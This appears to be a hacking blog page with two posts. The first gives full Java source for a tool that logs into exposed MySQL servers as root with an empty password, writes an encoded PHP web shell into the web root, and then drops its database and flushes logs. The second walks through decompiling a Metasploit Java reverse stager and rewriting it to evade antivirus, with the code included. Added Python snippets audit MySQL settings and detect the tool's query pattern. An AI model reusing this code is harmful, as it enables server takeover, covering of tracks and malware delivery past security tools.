Yeahhh, we got an upload script to upload your shell. Nothing new... ;)



Have pfun
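
An added example (not part of the original post or the author's code): the run shown above depends on several server-side conditions holding at once, namely MySQL reachable over the network, a `root` login with an empty password (the `USER`/`PASS` constants in the source), and the "Creating outfile" step being allowed to write into the web root. The sketch below audits a `my.ini` and an account list for those conditions. The function names, finding labels, sample configuration and account rows are constructed for illustration, and `has_password` is assumed to be precomputed from whichever password column the server version uses.

```python
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_mysqld_section(ini_text):
    """Return the [mysqld] options; '-' and '_' in option names are treated alike."""
    opts, section = {}, None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "mysqld":
            continue
        key, sep, value = line.partition("=")
        key = key.strip().lower().replace("-", "_")
        opts[key] = value.strip().strip("\"'") if sep else True  # bare flag, e.g. skip-networking
    return opts


def audit_mysql(ini_text, accounts):
    """accounts: rows with user, host, has_password (bool) and file_priv ('Y'/'N')."""
    opts = parse_mysqld_section(ini_text)
    findings = []

    # No bind-address means the server listens on every interface.
    exposed = not opts.get("skip_networking") and opts.get("bind_address") not in LOOPBACK
    if exposed:
        findings.append("NETWORK_EXPOSED")

    # Empty secure_file_priv places no restriction on where INTO OUTFILE may write.
    # Older releases default to empty; confirm the live value with SHOW VARIABLES.
    unrestricted = opts.get("secure_file_priv", "") == ""
    if unrestricted:
        findings.append("OUTFILE_UNRESTRICTED")

    risky_account = False
    for acc in accounts:
        name = f"{acc['user']}@{acc['host']}"
        remote = acc["host"] not in LOOPBACK
        if not acc["has_password"]:
            findings.append(f"EMPTY_PASSWORD {name}")
        if remote and acc["file_priv"] == "Y":
            findings.append(f"REMOTE_FILE_PRIV {name}")  # FILE is required for INTO OUTFILE
        if remote and not acc["has_password"] and acc["file_priv"] == "Y":
            risky_account = True

    # All three conditions must hold together; fixing any one of them closes the path.
    return {"findings": findings,
            "chain_open": exposed and unrestricted and risky_account}


# ---- constructed samples (paths and accounts are illustrative) ----
WEAK_INI = """
[client]
port=3306

[mysqld]
port=3306
basedir="C:/xampp/mysql"
# bind-address="127.0.0.1"
"""
WEAK_ACCOUNTS = [
    {"user": "root", "host": "localhost", "has_password": False, "file_priv": "Y"},
    {"user": "root", "host": "%", "has_password": False, "file_priv": "Y"},
    {"user": "app", "host": "localhost", "has_password": True, "file_priv": "N"},
]

HARDENED_INI = """
[mysqld]
bind-address=127.0.0.1
secure-file-priv="C:/xampp/mysql/export"
"""
HARDENED_ACCOUNTS = [
    {"user": "root", "host": "localhost", "has_password": True, "file_priv": "Y"},
    {"user": "app", "host": "localhost", "has_password": True, "file_priv": "N"},
]

if __name__ == "__main__":
    print(audit_mysql(WEAK_INI, WEAK_ACCOUNTS))
    print(audit_mysql(HARDENED_INI, HARDENED_ACCOUNTS))
```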



main.java



package sploit;

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.sql.Connection;
import java.sql.Date;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.sql.Statement;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.GregorianCalendar;
import java.util.Random;
import java.util.Scanner;

import sploit.checkshell;

public class main {
// JDBC driver name and database URL
static String output = null;
static String outputshell = null;

// Database credentials
static final String USER = "root";
static final String PASS = "";

/**
* @param args
* @throws IOException
*/



public static void main(String[] args) throws IOException {
System.out.println(" Mysql-Pwn-Agent-Exploit Beta 1 ");
System.out.println("_________________________________");
System.out.println("|.--------_--_------------_--__--.|");
System.out.println("|| Security-is-just-an-Illusion||");
System.out.println(";;`,_ by cr4shyyy __ ,:|");
System.out.println("((_(-,-----------.-.----------.-.)`)");
System.out.println("__ ) ,' `. _/");
System.out.println(": : |_________| : :");
System.out.println("|-'| ,'-.-.--.-.`. |`-|");
System.out.println("|_.| (( (* )(* ))) |._|");
System.out.println("| | `.-`-'--`-'.' | |");
System.out.println("|-'| | ,-.-.-. | |._|");
System.out.println("| | |(|-|-|-|)| | |");
System.out.println(":,': |_`-'-'-'_| ;`.;");
System.out.println(" ,' `. /._/");
System.out.println(" `._ ________________,' /");
System.out.println(" : ___________ : ,'");
System.out.println(" `.| | | | |,'");
System.out.println(" `.| | g0tr00t ? | | |");
System.out.println(" | | | |");
System.out.println("Hello nobody. Tonight we have a very special g33k Presentation.");
System.out.println("So, kick back and stretch your sack.");
System.out.println(" ");
System.out.println(" +++The Mentor+++ ");
System.out.println("We explore... and you call us criminals.");
System.out.println("We seek after knowledge... and you call us criminals.");
System.out.println("We exist without skin color, without nationality, without religious bias... and you call us criminals.");
System.out.println("You build atomic bombs, you wage wars, you murder, cheat,");
System.out.println("and lie to us and try to make us believe it's for our own good, yet we're the criminals.");

System.out.print("Press 2x Enter to fire ...");
Scanner sc = new Scanner(System.in);
while(!sc.nextLine().equals(""));
sc.nextLine();
sc.close();

// Open the file that is the first
// command line parameter
FileInputStream dirstream10 = new FileInputStream("shell.txt");
// Get the object of DataInputStream
DataInputStream dir0 = new DataInputStream(dirstream10);
BufferedReader b10 = new BufferedReader(new InputStreamReader(dir0));
String strLine10;
//Read File Line By Line

//Read File Line By Line
while ((strLine10 = b10.readLine()) != null) {
// Print the content on the console
String shell = strLine10;
//System.out.println (shell);

try{
// Open the file that is the first
// command line parameter
FileInputStream dirstream1 = new FileInputStream("dir.txt");
// Get the object of DataInputStream
DataInputStream dir = new DataInputStream(dirstream1);
BufferedReader b1 = new BufferedReader(new InputStreamReader(dir));
String strLine1;
//Read File Line By Line

//Read File Line By Line
while ((strLine1 = b1.readLine()) != null) {
// Print the content on the console
String dirbrute = strLine1;
//System.out.println (strLine1);


// Open the file that is the first
// command line parameter
FileInputStream fstream = new FileInputStream("scan.txt");
// Get the object of DataInputStream
DataInputStream in = new DataInputStream(fstream);
BufferedReader br = new BufferedReader(new InputStreamReader(in));
String strLine;


while ((strLine = br.readLine()) != null) {
// Print the content on the console
//System.out.println (strLine);

//Main Connect to db
Connection conn = null;
Statement stmt = null;
try{
//STEP 1: Init Random
Random ran = new Random();
int top = 6;
char data = ' ';
String dat = "";

for (int i=0; i<=top; i++) {
data = (char)(ran.nextInt(25)+97);
dat = data + dat;
}

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");
final String DB_URL = "jdbc:mysql://"+strLine+"/";
final String DB_URL3 = "jdbc:mysql://"+strLine+"/"+dat+"";
final String DB_URL2 = "jdbc:mysql://"+strLine+"/"+dat+"";


//STEP 3: Open a connection
System.out.println("#######################################################################");
System.out.println("###########################by cr4shyyy#################################");
System.out.println("#######################################################################");
System.out.println("Connecting to database..."+strLine);

conn = DriverManager.getConnection(DB_URL, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Creating database "+dat);
stmt = conn.createStatement();
String sql = "CREATE DATABASE "+dat;
stmt.executeUpdate(sql);
//System.out.println("Done...");

System.out.println("Creating Table "+dat);
String sql2 = "CREATE TABLE `"+dat+"`.`user_upload` (`track2` VARCHAR( 55060 ) NOT NULL) ENGINE = MYISAM ;";
stmt.executeUpdate(sql2);
//System.out.println("Done...");
System.out.println(dat+" Table created successfully...");

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");

//STEP 3: Open a connection
System.out.println(dat+" Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL2, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Insert Shell Into Table "+dat+"...");
stmt = conn.createStatement();
String sql0 = "INSERT INTO user_upload " + "VALUES ('<?php sleep(10);" +shell+ "" + " ?>')";
stmt.executeUpdate(sql0);
//System.out.println("Done...");



System.out.println("Creating outfile to hdd...");
String sql4 = "select * into outfile 'C:"+""+dirbrute+""+dat.toString() +".php'" + "from user_upload";

stmt.executeQuery(sql4);

System.out.println("Upload "+strLine1+""+ dat +".php Done...");
System.out.println("Successfully Exploit Done ...");


//STEP 3: Open a connection
System.out.println("Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL3, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Drop Database "+dat+"...");
stmt = conn.createStatement();
String sql01 = "DROP DATABASE "+dat;
stmt.executeUpdate(sql01);
//System.out.println("Done...");
System.out.println("Successfully Dropped "+dat+" Table ...");

System.out.println("Flush logs ...");
stmt = conn.createStatement();
String sql1 = "FLUSH LOGS";
stmt.executeUpdate(sql1);
//System.out.println("Done...");
System.out.println("Successfully FLUSH Logs Done ...");
System.out.println("#######################################################################");
System.out.println("#######################################################################");
if ((checkshell.exists("http://"+strLine+"/"+""+dat+".php")) == true) {
System.out.println("By Security-is-just-an-illusion.blogspot.de");
System.out.println("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
//System.out.println(checkshell.exists("http://"+strLine+"/"+""+dat+".php"));
FileWriter writer;
File file;
file = new File("results.txt");
writer = new FileWriter(file ,true);
writer.write(System.getProperty("line.separator"));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.write(System.getProperty("line.separator"));
writer.write("By http://Security-is-just-an-illusion.blogspot.de");
writer.write(System.getProperty("line.separator"));
writer.write("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
writer.write(System.getProperty("line.separator"));
GregorianCalendar now=new GregorianCalendar();
DateFormat df=DateFormat.getDateInstance(DateFormat.MEDIUM);
writer.write("Shell Date: "+df.format(now.getTime())+" ");
//System.out.println("Shell Date: "+df.format(now.getTime())+" ");
df=DateFormat.getTimeInstance(DateFormat.SHORT);
//System.out.println(df.format(now.getTime()));
writer.write(df.format(now.getTime()));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.flush();
writer.close();
}

else{
System.out.println("Shell_Exploit-Negativ.");
}

System.out.println("#######################################################################");
System.out.println("#######################################################################");

}catch(SQLException se){
//Handle errors for JDBC
System.err.println("SQLState: " +
((SQLException)se).getSQLState());
System.err.println("Error Code: " +
((SQLException)se).getErrorCode());
System.err.println("Message: " + se.getMessage());
}catch(Exception e){
//Handle errors for Class.forName
e.printStackTrace();
}finally{
//finally block used to close resources
try{
if(stmt!=null)
stmt.close();
}catch(SQLException se2){
}// nothing we can do
try{
if(conn!=null)
conn.close();
}catch(SQLException se){
System.out.println("SQL Fehler "+se.getMessage());
}//end finally try
}//end try
System.out.println("Goodbye by http://security-is-just-an-illusion.blogspot.de!");
//END

}
}
//Close the input stream
dir.close();
}catch (Exception e){//Catch exception if any
System.err.println("Error: " + e.getMessage());
}
}
}

private static boolean blub(String string) {
// TODO Auto-generated method stub
return false;
}
}


Checkshell.java






package sploit;
import java.net.*;

public class checkshell {

public static void mainshellcheck(String s[]) {
/*
output :
true
false
*/
}

public static boolean exists(String URLName){
try {
HttpURLConnection.setFollowRedirects(false);
// note : you may also need
// HttpURLConnection.setInstanceFollowRedirects(false)
HttpURLConnection con =
(HttpURLConnection) new URL(URLName).openConnection();
con.setRequestMethod("HEAD");
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
}

catch (Exception e) {
e.printStackTrace();
return false;
}
}
}



shell.txt




eval(base64_decode("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")); 



dir.txt



/htdocs/
/phpmyadmin/
/phpMyAdmin/
/PMA/
/pma/
/admin/
/dbadmin/
/mysql/
/myadmin/
/phpmyadmin2/
/phpMyAdmin2/
/phpMyAdmin-2/
/php-my-admin/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/
/mysqladmin/
/mysql-admin/
/xampp/htdocs/
/APMServ5.2.6/www/htdocs/
/www/htdocs/




Use it for Personal use or study purposes.
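For defenders, the statement sequence this tool issues (a `<?php` INSERT, a `SELECT ... INTO OUTFILE` to a `.php` path, `DROP DATABASE`, `FLUSH LOGS`, spread over several connections) is a detectable pattern. The following is an added example, not code from the original post: it scans a constructed log in an assumed, simplified general-query-log layout and correlates the steps by client host.

```python
import re
from collections import defaultdict

# Constructed sample in a simplified general-query-log layout (assumption):
#   <time> <thread_id> <Connect|Query> <argument>
# Real MySQL log layouts differ between versions; adapt LINE to yours.
SAMPLE_LOG = """\
2013-02-25T21:10:01 11 Connect root@198.51.100.7 on
2013-02-25T21:10:01 11 Query CREATE DATABASE qkzmwpa
2013-02-25T21:10:01 11 Query CREATE TABLE `qkzmwpa`.`user_upload` (`track2` VARCHAR( 55060 ) NOT NULL) ENGINE = MYISAM
2013-02-25T21:10:02 12 Connect root@198.51.100.7 on qkzmwpa
2013-02-25T21:10:02 12 Query INSERT INTO user_upload VALUES ('<?php /* constructed placeholder */ ?>')
2013-02-25T21:10:02 12 Query select * into outfile 'C:/xampp/htdocs/qkzmwpa.php'from user_upload
2013-02-25T21:10:03 13 Connect root@198.51.100.7 on qkzmwpa
2013-02-25T21:10:03 13 Query DROP DATABASE qkzmwpa
2013-02-25T21:10:03 13 Query FLUSH LOGS
2013-02-25T21:11:40 14 Connect app@10.0.0.5 on shop
2013-02-25T21:11:40 14 Query SELECT id, total FROM orders INTO OUTFILE '/var/backups/orders.csv'
2013-02-25T21:11:41 14 Query INSERT INTO notes VALUES ('see <?php docs')
"""

LINE = re.compile(r"^(\S+)\s+(\d+)\s+(Connect|Query)\s+(.*)$")
OUTFILE = re.compile(r"\binto\s+(?:out|dump)file\s+'([^']+)'", re.IGNORECASE)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")


def classify(argument):
    """Return (stage, evidence) for one statement, or None if it is not of interest."""
    low = argument.lower().lstrip()
    out = OUTFILE.search(argument)
    if out:
        path = out.group(1)
        # Exports to data files are normal; exports to a script extension are not.
        return ("script_outfile", path) if path.lower().endswith(SCRIPT_EXT) else None
    if low.startswith("insert") and "<?php" in low:
        return ("php_insert", argument[:60])
    if low.startswith("drop database"):
        return ("drop_database", argument)
    if low.startswith("flush logs"):
        return ("flush_logs", argument)
    return None


def analyse(log_text):
    """Correlate statements by client host, since each step may use a new connection."""
    host_of = {}                      # thread id -> client host from the Connect line
    seen = defaultdict(dict)          # client host -> {stage: first evidence}
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        _time, thread, command, argument = m.groups()
        if command == "Connect":
            host_of[thread] = argument.split()[0].rsplit("@", 1)[-1]
            continue
        hit = classify(argument)
        if hit:
            host = host_of.get(thread, "thread-" + thread)
            seen[host].setdefault(hit[0], hit[1])
    findings = []
    for host, stages in seen.items():
        if "script_outfile" not in stages:
            continue                  # a PHP-looking INSERT alone is not the pattern
        findings.append({
            "host": host,
            "path": stages["script_outfile"],
            "stages": sorted(stages),
            "severity": "high" if len(stages) >= 3 else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

The technique only works when a remotely reachable account holds the FILE privilege and the server may write into the web root; setting `secure_file_priv` to a directory outside the document root and not granting FILE to remote accounts removes it.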

Saturday, February 2, 2013

45 x AntiVirus Software Fail Again …. Java Reverse MetaSploit-Stager 97 % FUD

Posted by at Saturday, February 02, 2013


Let me present you the Java Reverse MetaSploit Stager.

Here is a VirusTotal scan of the default Metasploit payload.


Detection ratio: 31 / 46
File name: evil2.jar
File type: JAR
AntiVir: EXP/JAVA.Carbul.Gen
GData: Application.Metasploit.4441

and many more finds on this payload. Good news ….. not really.

Most antivirus products use a simple pattern to detect viruses, malware, payloads, exploits ….

Now it's time to get dirty?

Get a Java decompiler and decompile the payload.jar file.

I use the JD plugin for Eclipse. Google is your best friend.

Now we have the Java source of the Metasploit stager.

package metasploit;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PrintStream;
import java.lang.reflect.Method;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.net.URLConnection;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.util.Hashtable;
import java.util.Locale;
import java.util.Properties;
import java.util.Stack;
import java.util.StringTokenizer;
import java.util.Vector;

public class Payload extends ClassLoader
{
private static final String OS_NAME = System.getProperty("os.name").toLowerCase(Locale.ENGLISH);
private static final String PATH_SEP = System.getProperty("path.separator");
private static final boolean IS_AIX = "aix".equals(OS_NAME);
private static final boolean IS_DOS = PATH_SEP.equals(";");
private static final String JAVA_HOME = System.getProperty("java.home");

public static void main(String[] paramArrayOfString)
throws Exception
{
Properties localProperties = new Properties();
Class localClass = Payload.class;
String str1 = localClass.getName().replace('.', '/') + ".class";
InputStream localInputStream = localClass.getResourceAsStream("/metasploit.dat");
if (localInputStream != null)
{
localProperties.load(localInputStream);
localInputStream.close();
}
String str2 = localProperties.getProperty("Executable");
File localFile2;
if (str2 != null)
{
File localFile1 = File.createTempFile("~spawn", ".tmp");
localFile1.delete();
localObject1 = new File(localFile1.getAbsolutePath() + ".dir");
((File)localObject1).mkdir();
localFile2 = new File((File)localObject1, str2);
writeEmbeddedFile(localClass, str2, localFile2);
localProperties.remove("Executable");
localProperties.put("DroppedExecutable", localFile2.getCanonicalPath());
}
int i = Integer.parseInt(localProperties.getProperty("Spawn", "0"));
Object localObject1 = localProperties.getProperty("DroppedExecutable");
Object localObject2;
Object localObject3;
Object localObject4;
Object localObject5;
Object localObject6;
int m;
if (i > 0)
{
localProperties.setProperty("Spawn", String.valueOf(i - 1));
localFile2 = File.createTempFile("~spawn", ".tmp");
localFile2.delete();
File localFile3 = new File(localFile2.getAbsolutePath() + ".dir");
localObject2 = new File(localFile3, "metasploit.dat");
localObject3 = new File(localFile3, str1);
((File)localObject3).getParentFile().mkdirs();
writeEmbeddedFile(localClass, str1, (File)localObject3);
if (localProperties.getProperty("URL", "").startsWith("https:"))
writeEmbeddedFile(localClass, "metasploit/PayloadTrustManager.class", new File(((File)localObject3).getParentFile(), "PayloadTrustManager.class"));
if (localProperties.getProperty("AESPassword", null) != null)
writeEmbeddedFile(localClass, "metasploit/AESEncryption.class", new File(((File)localObject3).getParentFile(), "AESEncryption.class"));
localObject4 = new FileOutputStream((File)localObject2);
localProperties.store((OutputStream)localObject4, "");
((FileOutputStream)localObject4).close();
localObject5 = Runtime.getRuntime().exec(new String[] { getJreExecutable("java"), "-classpath", localFile3.getAbsolutePath(), localClass.getName() });
((Process)localObject5).getInputStream().close();
((Process)localObject5).getErrorStream().close();
Thread.sleep(2000L);
localObject6 = new File[] { localObject3, ((File)localObject3).getParentFile(), localObject2, localFile3 };
for (int k = 0; k < localObject6.length; k++)
for (m = 0; (m < 10) && (!localObject6[k].delete()); m++)
{
localObject6[k].deleteOnExit();
Thread.sleep(100L);
}
}
if (localObject1 != null)
{
localFile2 = new File((String)localObject1);
if (!IS_DOS)
try
{
try
{
class$java$io$File.getMethod("setExecutable", new Class[] { Boolean.TYPE }).invoke(localFile2, new Object[] { Boolean.TRUE });
}
catch (NoSuchMethodException localNoSuchMethodException)
{
Runtime.getRuntime().exec(new String[] { "chmod", "+x", localObject1 }).waitFor();
}
}
catch (Exception localException)
{
localException.printStackTrace();
}
Runtime.getRuntime().exec(new String[] { localObject1 });
if (!IS_DOS)
{
localFile2.delete();
localFile2.getParentFile().delete();
}
}
else
{
int j = Integer.parseInt(localProperties.getProperty("LPORT", "4444"));
String str3 = localProperties.getProperty("LHOST", null);
localObject2 = localProperties.getProperty("URL", null);
if (j <= 0)
{
localObject3 = System.in;
localObject4 = System.out;
}
else if (localObject2 != null)
{
if (((String)localObject2).startsWith("raw:"))
{
localObject3 = new ByteArrayInputStream(((String)localObject2).substring(4).getBytes("ISO-8859-1"));
}
else if (((String)localObject2).startsWith("https:"))
{
localObject5 = new URL((String)localObject2).openConnection();
Class.forName("metasploit.PayloadTrustManager").getMethod("useFor", new Class[] { URLConnection.class }).invoke(null, new Object[] { localObject5 });
localObject3 = ((URLConnection)localObject5).getInputStream();
}
else
{
localObject3 = new URL((String)localObject2).openStream();
}
localObject4 = new ByteArrayOutputStream();
}
else
{
if (str3 != null)
{
localObject5 = new Socket(str3, j);
}
else
{
localObject6 = new ServerSocket(j);
localObject5 = ((ServerSocket)localObject6).accept();
((ServerSocket)localObject6).close();
}
localObject3 = ((Socket)localObject5).getInputStream();
localObject4 = ((Socket)localObject5).getOutputStream();
}
localObject5 = localProperties.getProperty("AESPassword", null);
if (localObject5 != null)
{
localObject6 = (Object[])Class.forName("metasploit.AESEncryption").getMethod("wrapStreams", new Class[] { InputStream.class, OutputStream.class, String.class }).invoke(null, new Object[] { localObject3, localObject4, localObject5 });
localObject3 = (InputStream)localObject6[0];
localObject4 = (OutputStream)localObject6[1];
}
localObject6 = new StringTokenizer("Payload -- " + localProperties.getProperty("StageParameters", ""), " ");
String[] arrayOfString = new String[((StringTokenizer)localObject6).countTokens()];
for (m = 0; m < arrayOfString.length; m++)
arrayOfString[m] = ((StringTokenizer)localObject6).nextToken();
new Payload().bootstrap((InputStream)localObject3, (OutputStream)localObject4, localProperties.getProperty("EmbeddedStage", null), arrayOfString);
}
}

private static void writeEmbeddedFile(Class paramClass, String paramString, File paramFile)
throws FileNotFoundException, IOException
{
InputStream localInputStream = paramClass.getResourceAsStream("/" + paramString);
FileOutputStream localFileOutputStream = new FileOutputStream(paramFile);
byte[] arrayOfByte = new byte[4096];
int i;
while ((i = localInputStream.read(arrayOfByte)) != -1)
localFileOutputStream.write(arrayOfByte, 0, i);
localFileOutputStream.close();
}

private final void bootstrap(InputStream paramInputStream, OutputStream paramOutputStream, String paramString, String[] paramArrayOfString)
throws Exception
{
try
{
DataInputStream localDataInputStream = new DataInputStream(paramInputStream);
Permissions localPermissions = new Permissions();
localPermissions.add(new AllPermission());
ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
Class localClass;
if (paramString == null)
{
int i = localDataInputStream.readInt();
do
{
byte[] arrayOfByte = new byte[i];
localDataInputStream.readFully(arrayOfByte);
resolveClass(localClass = defineClass(null, arrayOfByte, 0, i, localProtectionDomain));
i = localDataInputStream.readInt();
}
while (i > 0);
}
else
{
localClass = Class.forName("javapayload.stage." + paramString);
}
Object localObject = localClass.newInstance();
localClass.getMethod("start", new Class[] { DataInputStream.class, OutputStream.class, new String[0].getClass() }).invoke(localObject, new Object[] { localDataInputStream, paramOutputStream, paramArrayOfString });
}
catch (Throwable localThrowable)
{
localThrowable.printStackTrace(new PrintStream(paramOutputStream));
}
}

private static String getJreExecutable(String paramString)
{
File localFile = null;
if (IS_AIX)
localFile = findInDir(JAVA_HOME + "/sh", paramString);
if (localFile == null)
localFile = findInDir(JAVA_HOME + "/bin", paramString);
if (localFile != null)
return localFile.getAbsolutePath();
return addExtension(paramString);
}

private static String addExtension(String paramString)
{
return paramString + (IS_DOS ? ".exe" : "");
}

private static File findInDir(String paramString1, String paramString2)
{
File localFile1 = normalize(paramString1);
File localFile2 = null;
if (localFile1.exists())
{
localFile2 = new File(localFile1, addExtension(paramString2));
if (!localFile2.exists())
localFile2 = null;
}
return localFile2;
}

private static File normalize(String paramString)
{
Stack localStack = new Stack();
String[] arrayOfString = dissect(paramString);
localStack.push(arrayOfString[0]);
StringTokenizer localStringTokenizer = new StringTokenizer(arrayOfString[1], File.separator);
while (localStringTokenizer.hasMoreTokens())
{
localObject = localStringTokenizer.nextToken();
if (!".".equals(localObject))
if ("..".equals(localObject))
{
if (localStack.size() < 2)
return new File(paramString);
localStack.pop();
}
else
{
localStack.push(localObject);
}
}
Object localObject = new StringBuffer();
for (int i = 0; i < localStack.size(); i++)
{
if (i > 1)
((StringBuffer)localObject).append(File.separatorChar);
((StringBuffer)localObject).append(localStack.elementAt(i));
}
return new File(((StringBuffer)localObject).toString());
}

private static String[] dissect(String paramString)
{
char c = File.separatorChar;
paramString = paramString.replace('/', c).replace('\\', c);
String str = null;
int i = paramString.indexOf(':');
int j;
if ((i > 0) && (IS_DOS))
{
j = i + 1;
str = paramString.substring(0, j);
char[] arrayOfChar = paramString.toCharArray();
str = str + c;
j = arrayOfChar[j] == c ? j + 1 : j;
StringBuffer localStringBuffer = new StringBuffer();
for (int k = j; k < arrayOfChar.length; k++)
if ((arrayOfChar[k] != c) || (arrayOfChar[(k - 1)] != c))
localStringBuffer.append(arrayOfChar[k]);
paramString = localStringBuffer.toString();
}
else if ((paramString.length() > 1) && (paramString.charAt(1) == c))
{
j = paramString.indexOf(c, 2);
j = paramString.indexOf(c, j + 1);
str = j > 2 ? paramString.substring(0, j + 1) : paramString;
paramString = paramString.substring(str.length());
}
else
{
str = File.separator;
paramString = paramString.substring(1);
}
return new String[] { str, paramString };
}
}


I'm not a dev and I never learned Java, just a normal guy like you with a small brain.

But if we read the source code we can learn many things, or use Google, it's my best friend. Big thanks to Google and the guys who fill it, I love you.

Now we build a new Java project in Eclipse and paste the Java source code into it.

Fix the errors ;)

Try to compile it and check if it works.

Now it's time to change the source code, else the antivirus software will find your payload.

After some long time ….. 15 mins recoding ;)

Time to test the new payload.

Start Armitage, open a Java Meterpreter Reverse TCP and start listening on your port.

After some time my new Metasploit payload works with small changes ;)

But is it now FUD? Let's test it again on VirusTotal.



Detection ratio: 1 / 46
File name: Gameload.class
File type: Java Bytecode
AntiVir: EXP/JAVA.Loader.Gen



97 % FUD. I tested many things to get it 100 % FUD but atm I can't find the AntiVir pattern ;) Good work .. shame on me ……



Now you can compile the Java code to a JAR or compile the class into an EXE file. Read the other post on how to do it.



We got the same results.

Detection ratio: 1 / 46

I split the exe file and found the AntiVir pattern.











I know if I want it 100 % FUD I get it FUD, but atm I don't have fun to spend too much time on it.

97 % FUD, I think it's OK ;)

And here is the Java source code of the new 97 % FUD Java Metasploit stager.



Gameload.java




/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

package sploit;

import java.io.*;
import java.lang.reflect.Method;
import java.net.*;
import java.security.*;
import java.security.cert.Certificate;
import java.util.*;

@SuppressWarnings("unused")
public class Gameload extends ClassLoader
{

public Gameload()
{
}

public static void main(String[] args) {
// TODO Auto-generated method stub
try {
crashyyy(null);
} catch (Exception e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}

@SuppressWarnings("resource")
public static void crashyyy(String args[])
throws Exception
{
Properties properties = new Properties();

@SuppressWarnings("rawtypes")
Class play1 = sploit.Gameload.class;

String s = play1.getName().replace('.', '/') + ".class";

InputStream inputstream = play1.getResourceAsStream("/SecurityisjustanIllusion.dat"); // Fuck Avast GData Sophos ;) Just Pattern a .dat file lamers

if(inputstream != null)
{
properties.load(inputstream);

inputstream.close();
}

String zero1 = properties.getProperty("Execute");

if(zero1 != null)

{
File gayfile = File.createTempFile("~0Gay", ".SecurityisjustanIllusion");

gayfile.delete();

File gayfile1 = new File(gayfile.getAbsolutePath() + ".dir");

gayfile1.mkdir();

File gayfile2 = new File(gayfile1, zero1);

writeEmbeddedFile(play1, zero1, gayfile2);

properties.remove("Execute");

